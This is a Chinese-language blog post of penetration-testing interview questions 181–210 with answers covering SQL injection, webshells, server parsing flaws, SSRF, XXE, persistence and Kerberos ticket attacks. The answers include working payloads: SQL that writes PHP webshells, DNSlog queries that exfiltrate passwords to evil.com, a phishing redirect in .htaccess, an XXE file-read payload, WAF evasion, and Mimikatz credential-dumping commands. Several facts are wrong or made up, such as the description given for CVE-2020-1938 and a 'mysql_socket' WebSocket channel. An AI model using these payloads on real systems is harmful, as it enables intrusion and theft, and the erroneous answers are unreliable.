2026年渗透测试面试题总结-7（题目+回答）

安全领域各种资源，学习文档，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具，欢迎关注。

[181. CMS渗透中扫目录的意义](#181. CMS渗透中扫目录的意义)

[182. 常见网站服务器容器](#182. 常见网站服务器容器)

[183. MySQL注入写Shell的条件](#183. MySQL注入写Shell的条件)

[184. 容器解析漏洞案例](#184. 容器解析漏洞案例)

[185. 快速判断服务器操作系统](#185. 快速判断服务器操作系统)

[186. MySQL仅开放80端口的可能原因](#186. MySQL仅开放80端口的可能原因)

[187. 3389无法连接的排查点](#187. 3389无法连接的排查点)

[188. 绕过注入中转义字符](#188. 绕过注入中转义字符)

[189. 发现后台编辑器的首要操作](#189. 发现后台编辑器的首要操作)

[190. 利用.htaccess文件的攻击手法](#190. 利用.htaccess文件的攻击手法)

复制代码
181	一个成熟并且相对安全的CMS，渗透时扫目录的意义？
182	常见的网站服务器容器。
183	mysql注入点，用工具对目标站直接写入一句话，需要哪些条件？
184	目前已知哪些版本的容器有解析漏洞，具体举例
185	如何手工快速判断目标站是windows还是linux服务器？
186	为何一个mysql数据库的站，只有一个80端口开放？
187	3389无法连接的几种情况
188	如何突破注入时字符被转义？
189	在某后台新闻编辑界面看到编辑器，应该先做什么？
190	拿到一个webshell发现网站根目录下有.htaccess文件，我们能做什么？
191	注入漏洞只能查账号密码？
192	安全狗会追踪变量，从而发现出是一句话木马吗？
193	提权时选择可读写目录，为何尽量不用带空格的目录？
194	access扫出后缀为asp的数据库文件，访问乱码，如何实现到本地利用？
195	某服务器有站点 A，B 为何在 A 的后台添加 test 用户，访问 B 的后台。发现也添加上了 test 用户？
196	注入时可以不使用and或or或xor，直接orderby开始注入吗？
197	无文件渗透
198	MySQL写WebShell有几种方式，利用条件
199	Sql注入无回显的情况下，利用DNSlog，mysql下利用什么构造代码，mssql下又如何？
200	phpmyadmin写sehll的方法
201	权限维持的方法
202	XXE漏洞原理，代码审计如何寻找？
203	SSRF禁用127.0.0.1后如何绕过，支持哪些协议？
204	应急响应如何查找挖矿病毒，如何通过进程找到挖矿文件
205	struts2框架漏洞原理
206	JAVA反序列化原理
207	cors如何产生，有哪些利用方式？绕过同源策略的方法有哪些？jsonp跨域如何利用？
208	phar协议如何利用
209	内网服务器，如何进行信息收集
210	内网黄金票据、白银票据的区别和利用方式。 
181. CMS渗透中扫目录的意义

发现敏感文件：备份文件（.bak/.swp）、配置文件（config.php）、版本记录（.git）

识别入口点：后台路径（/admin）、安装脚本（/install）、API文档

探测漏洞痕迹：日志文件（error.log）、调试页面（phpinfo.php）

辅助漏洞利用：通过robots.txt发现隐藏目录，通过README.md确认CMS版本

182. 常见网站服务器容器

容器类型代表产品典型特征

Java容器 Tomcat, JBoss, WebLogic 支持JSP/Servlet

微软系 IIS (Internet Information Services) 支持ASP.NET

PHP容器 Apache, Nginx (FastCGI模式) .htaccess/Location规则

Python容器 uWSGI, Gunicorn WSGI协议支持

Node.js PM2, Express内置服务器监听非标准端口

183. MySQL注入写Shell的条件
复制代码
Sql
``1. 具备FILE权限（需root或高权账号） → 执行 SELECT @@global.secure_file_priv 验证 2. 知晓绝对路径（通过报错/配置文件泄露） 3. 可写目录权限（如/tmp、/var/www/uploads） 4. 未禁用SELECT INTO OUTFILE → 利用语句：`SELECT '<?php eval($_POST[cmd]);?>' INTO OUTFILE '/var/www/shell.php'```

184. 容器解析漏洞案例

IIS 5.x/6.0 ：
/test.asp;.jpg 被当作ASP执行（分号截断）

Apache 1.x/2.x ：
多后缀解析：test.php.jpg 当PHP执行（配置错误时）

Nginx ≤0.8.37 ：
test.jpg%00.php 空字节截断漏洞

Tomcat 特定版本 ：
/test.jsp/ 目录后缀解析（CVE-2020-1938）

185. 快速判断服务器操作系统

HTTP头特征 ：
Server: Microsoft-IIS → Windows
X-Powered-By: PHP/Linux → Linux

文件路径区分 ：
注入 '../' → Windows返回路径错误含 \，Linux含 /

命令注入测试 ：
ping%20-c%201%20127.0.0.1（Linux）
ping%20-n%201%20127.0.0.1（Windows）

大小写敏感 ：
访问 /Test 和 /test → Linux区分大小写

186. MySQL仅开放80端口的可能原因

端口隐藏 ：MySQL绑定127.0.0.1仅允许本地访问

反向代理 ：Nginx/Apache将/phpmyadmin代理到MySQL

WebSocket通道 ：通过PHP的mysql_socket连接

防火墙策略：仅放行80端口（云服务器安全组限制）

187. 3389无法连接的排查点

网络层：防火墙拦截（本地/云端安全组）、IP被拉黑

服务层 ：RDP服务未启动、端口被修改（注册表HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp）

认证层：空密码禁用策略、NLA（网络级认证）强制开启

资源限制：已达最大连接数（默认2连接）

188. 绕过注入中转义字符

编码绕过 ：Hex编码（0x636D64代替'cmd'）、URL编码

注释截断 ：'/**/OR/**/1=1-- -

多重嵌套 ：'+(select 1 where 1=1)+'

非常规函数 ：MySQL的CONCAT()拼接、SQL Server的CHAR(65)+CHAR(66)

189. 发现后台编辑器的首要操作

指纹识别：确定编辑器类型（CKEditor/UEditor/KindEditor）

漏洞扫描 ：

上传漏洞：/ueditor/net/controller.ashx?action=uploadfile

XSS漏洞：插入<script>alert(document.cookie)</script>

目录爆破 ：寻找/editor/、/plugins/等历史漏洞目录

配置审计 ：尝试访问/ueditor/ueditor.config.js获取配置信息

190. 利用.htaccess文件的攻击手法
覆盖解析规则 ：
复制代码
Apache
AddType application/x-httpd-php .jpg //使jpg文件当作PHP执行
目录权限绕过 ：
复制代码
Apache
Require all granted //绕过目录访问限制
重定向恶意流量 ：
复制代码
Apache
Redirect 302 /login.php http://evil.com/phish.php
禁用安全函数 ：
复制代码
Apache
php_value auto_prepend_file "shell.jpg"
191. 注入漏洞利用不限于密码 ：

可拖库（UNION SELECT table_name FROM information_schema.tables）、读文件（LOAD_FILE()）、写Shell、SSRF（MySQL的LOAD DATA本地请求）。

192. 安全狗检测一句话原理 ：

通过动态污点分析追踪变量传递路径，匹配eval($_POST[cmd])等特征代码片段（可规避：拆分关键字$_GET['a']($_GET['b'])）。

193. 避免带空格目录的原因 ：

命令行执行时空格需转义（如c:\program误解析为两个参数），推荐使用短路径（c:\progra~1\）或双引号包裹。

194. Access数据库乱码处理：

下载数据库至本地

用Access打开时指定编码为GB2312

或使用oledb连接串："Provider=Microsoft.Jet.OLEDB.4.0;Data Source=test.mdb;Jet OLEDB:Database Password=xxx;"

195. 站点用户同步的原因 ：

Session共享机制（Redis/Memcached存储会话）、相同数据库用户表、跨域SSO认证漏洞。

196. Order By注入原理 ：

通过错误/时间盲注：
复制代码
Sql
ORDER BY (SELECT 1 FROM DUAL WHERE 1=IF(SUBSTR(version(),1,1)=5,SLEEP(5),0))

197. 无文件渗透技术：

PowerShell内存加载（Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords"'）

Windows WMI事件订阅

.NET Assembly反射加载

198. MySQL写WebShell方式：

方法条件示例语句

INTO OUTFILE FILE权限+绝对路径 SELECT '<?php system($_GET[c]);?>' INTO OUTFILE '/var/www/shell.php'

日志文件写入需可写日志目录 SET global general_log_file='/var/www/shell.php'; SET global general_log=1; SELECT '<?php eval($_POST[cmd]);?>';

慢查询日志写入需slow_query_log=ON SET GLOBAL slow_query_log_file='/var/www/shell.php'; SELECT BENCHMARK(9000000,MD5('test'));

199. DNSlog外带注入：
MySQL ：
复制代码
Sql
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users LIMIT 1),'.evil.com\\test'))
MSSQL ：
复制代码
Sql
EXEC master..xp_dirtree '\\'+(SELECT TOP 1 name FROM sysobjects)+'.evil.com\'
200. phpMyAdmin写Shell方法：

SQL执行：SELECT '<?php system($_GET[cmd]);?>' INTO OUTFILE '/var/www/shell.php'

修改phpMyAdmin配置文件：$cfg['TempDir']设置为Web目录

利用CSRF漏洞诱导管理员执行恶意SQL

201. 权限维持技术：

Windows：注册表自启动项、计划任务、服务注入、WMI事件订阅

Linux：crontab定时任务、.bashrc后门、ssh authorized_keys公钥

Web层：内存马（Servlet/Filter型）、隐蔽后门（图片马+包含漏洞）

202. XXE漏洞审计要点：
代码搜索函数：loadXML()、SimpleXMLElement()、xml_parse()

检查libxml_disable_entity_loader(false)设置
典型Payload：
复制代码
Xml
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <data>&xxe;</data>
203. SSRF绕过禁用127.0.0.1：

IP变形 ：0x7f000001、0177.0.0.1（八进制）、127.1

域名重定向 ：http://spoofed.burpcollaborator.net → 本地DNS解析为127.0.0.1

协议利用 ：gopher://攻击内网Redis、dict://探测端口

CIDR绕过 ：/admin → 本地访问（部分系统识别为127.0.0.1）

204. 挖矿病毒应急响应：

定位进程 ：top/htop查异常CPU占用（通常伪装为kworker）

溯源文件 ：lsof -p <PID> → 查看进程打开文件

清除手段 ：删除定时任务（/etc/cron.d/）、清空authorized_keys、更新SSH密钥

205. Struts2漏洞根源 ： OGNL表达式注入（如S2-045）：攻击者通过Content-Type头传入恶意OGNL代码，框架解析时执行任意命令。核心问题在于未严格过滤用户输入直接传入表达式引擎。

206. Java反序列化漏洞原理 ：当应用使用ObjectInputStream.readObject()反序列化不可信数据时，攻击者可构造恶意对象（如Apache Commons Collections的InvokerTransformer），在反序列化过程中触发RCE。

207. CORS与跨域利用：

CORS漏洞成因 ：服务端设置Access-Control-Allow-Origin: *或未验证Origin头

利用方式 ：窃取用户数据（fetch('https://bank.com') + 转发结果）

JSONP劫持 ：通过<script>标签加载API（需callback参数），截获返回数据

208. Phar协议利用场景 ：构造恶意Phar文件触发反序列化（需phar.readonly=Off）：
复制代码
Php
// 生成Phar $phar = new Phar("test.phar"); $phar->startBuffering(); $phar->addFromString("test.txt", "data"); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $phar->setMetadata($maliciousObject); // 插入恶意对象 $phar->stopBuffering();

209. 内网信息收集要点：

主机发现 ：arp-scan、nmap -sn

服务扫描 ：SMB枚举（enum4linux）、Redis未授权访问

凭证获取：内存dump（Mimikatz）、配置文件（数据库连接串）

拓扑探测 ：路由追踪（traceroute）、代理链配置

210. Kerberos票据攻击对比：

对比项 黄金票据（Golden Ticket） 白银票据（Silver Ticket）

获取条件 需域控krbtgt账号的NT-Hash 仅需服务账号NTLM Hash

利用范围 访问域内任意服务仅针对特定服务（如CIFS/MSSQL）

检测难度 易被检测（TGS请求异常）难检测（无TGS请求）

命令示例 mimikatz # kerberos::golden mimikatz # kerberos::silver

容器类型	代表产品	典型特征
Java容器	Tomcat, JBoss, WebLogic	支持JSP/Servlet
微软系	IIS (Internet Information Services)	支持ASP.NET
PHP容器	Apache, Nginx (FastCGI模式)	.htaccess/Location规则
Python容器	uWSGI, Gunicorn	WSGI协议支持
Node.js	PM2, Express内置服务器	监听非标准端口

方法	条件	示例语句
`INTO OUTFILE`	FILE权限+绝对路径	`SELECT '<?php system($_GET[c]);?>' INTO OUTFILE '/var/www/shell.php'`
日志文件写入	需可写日志目录	`SET global general_log_file='/var/www/shell.php'; SET global general_log=1; SELECT '<?php eval($_POST[cmd]);?>';`
慢查询日志写入	需`slow_query_log=ON`	`SET GLOBAL slow_query_log_file='/var/www/shell.php'; SELECT BENCHMARK(9000000,MD5('test'));`

对比项	黄金票据（Golden Ticket）	白银票据（Silver Ticket）
获取条件	需域控krbtgt账号的NT-Hash	仅需服务账号NTLM Hash
利用范围	访问域内任意服务	仅针对特定服务（如CIFS/MSSQL）
检测难度	易被检测（TGS请求异常）	难检测（无TGS请求）
命令示例	`mimikatz # kerberos::golden`	`mimikatz # kerberos::silver`